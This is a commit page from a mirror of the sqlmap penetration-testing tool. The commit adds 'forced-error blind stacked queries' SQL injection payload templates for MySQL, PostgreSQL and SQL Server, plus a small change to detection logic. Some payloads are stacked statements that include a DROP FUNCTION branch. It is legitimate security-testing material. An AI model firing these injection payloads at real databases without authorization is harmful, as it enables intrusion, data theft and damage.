mirror of
				https://github.com/sqlmapproject/sqlmap.git
				synced 2025-10-26 21:51:12 +03:00 
			
		
		
		
	world premiere of "forced-error blind stacked" payloads (spent 3 hours on pgsql)
This commit is contained in:
		
							parent
							
								
									79e4b1efd5
								
							
						
					
					
						commit
						7c4c79477d
					
				|  | @ -50,6 +50,7 @@ from lib.core.exception import sqlmapUserQuitException | |||
| from lib.core.session import setDynamicMarkings | ||||
| from lib.core.settings import CONSTANT_RATIO | ||||
| from lib.core.settings import UNKNOWN_DBMS_VERSION | ||||
| from lib.core.settings import LOWER_RATIO_BOUND | ||||
| from lib.core.settings import UPPER_RATIO_BOUND | ||||
| from lib.core.threads import getCurrentThreadData | ||||
| from lib.core.unescaper import unescaper | ||||
|  | @ -315,6 +316,11 @@ def checkSqlInjection(place, parameter, value): | |||
|                             kb.matchRatio = None | ||||
|                             _ = Request.queryPage(cmpPayload, place, raise404=False) | ||||
| 
 | ||||
|                             # If in the comparing stage there was an error | ||||
|                             # then anything non-error will be considered as True | ||||
|                             if kb.errorIsNone and kb.matchRatio is None: | ||||
|                                 kb.matchRatio = LOWER_RATIO_BOUND | ||||
| 
 | ||||
|                             # Perform the test's True request | ||||
|                             trueResult = Request.queryPage(reqPayload, place, raise404=False) | ||||
| 
 | ||||
|  |  | |||
|  | @ -1558,6 +1558,67 @@ Formats: | |||
|     <!-- End of stacked queries tests --> | ||||
| 
 | ||||
| 
 | ||||
|     <!-- Forced-error blind stacked queries tests --> | ||||
|     <test> | ||||
|         <title>MySQL forced-error blind stacked queries</title> | ||||
|         <stype>1</stype> | ||||
|         <level>3</level> | ||||
|         <risk>0</risk> | ||||
|         <clause>0</clause> | ||||
|         <where>1</where> | ||||
|         <vector>; IF(([INFERENCE]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]);</vector> | ||||
|         <request> | ||||
|             <payload>; IF(([RANDNUM]=[RANDNUM]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]);</payload> | ||||
|             <comment>#</comment> | ||||
|         </request> | ||||
|         <response> | ||||
|             <comparison>; IF(([RANDNUM]=[RANDNUM1]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]);</comparison> | ||||
|         </response> | ||||
|         <details> | ||||
|             <dbms>MySQL</dbms> | ||||
|         </details> | ||||
|     </test> | ||||
| 
 | ||||
|     <test> | ||||
|         <title>PostgreSQL forced-error blind stacked queries</title> | ||||
|         <stype>1</stype> | ||||
|         <level>3</level> | ||||
|         <risk>0</risk> | ||||
|         <clause>0</clause> | ||||
|         <where>2</where> | ||||
|         <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END);</vector> | ||||
|         <request> | ||||
|             <payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END);</payload> | ||||
|             <comment>--</comment> | ||||
|         </request> | ||||
|         <response> | ||||
|             <comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END);</comparison> | ||||
|         </response> | ||||
|     </test> | ||||
| 
 | ||||
|     <test> | ||||
|         <title>Microsoft SQL Server/Sybase forced-error blind stacked queries</title> | ||||
|         <stype>1</stype> | ||||
|         <level>3</level> | ||||
|         <risk>0</risk> | ||||
|         <clause>0</clause> | ||||
|         <where>1</where> | ||||
|         <vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</vector> | ||||
|         <request> | ||||
|             <payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</payload> | ||||
|             <comment>--</comment> | ||||
|         </request> | ||||
|         <response> | ||||
|             <comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</comparison> | ||||
|         </response> | ||||
|         <details> | ||||
|             <dbms>Microsoft SQL Server</dbms> | ||||
|             <os>Windows</os> | ||||
|         </details> | ||||
|     </test> | ||||
|     <!-- End of forced-error blind stacked queries tests --> | ||||
| 
 | ||||
| 
 | ||||
|     <!-- AND time-based blind tests --> | ||||
|     <test> | ||||
|         <title>MySQL > 5.0.11 AND time-based blind</title> | ||||
|  |  | |||
		Loading…
	
		Reference in New Issue
	
	Block a user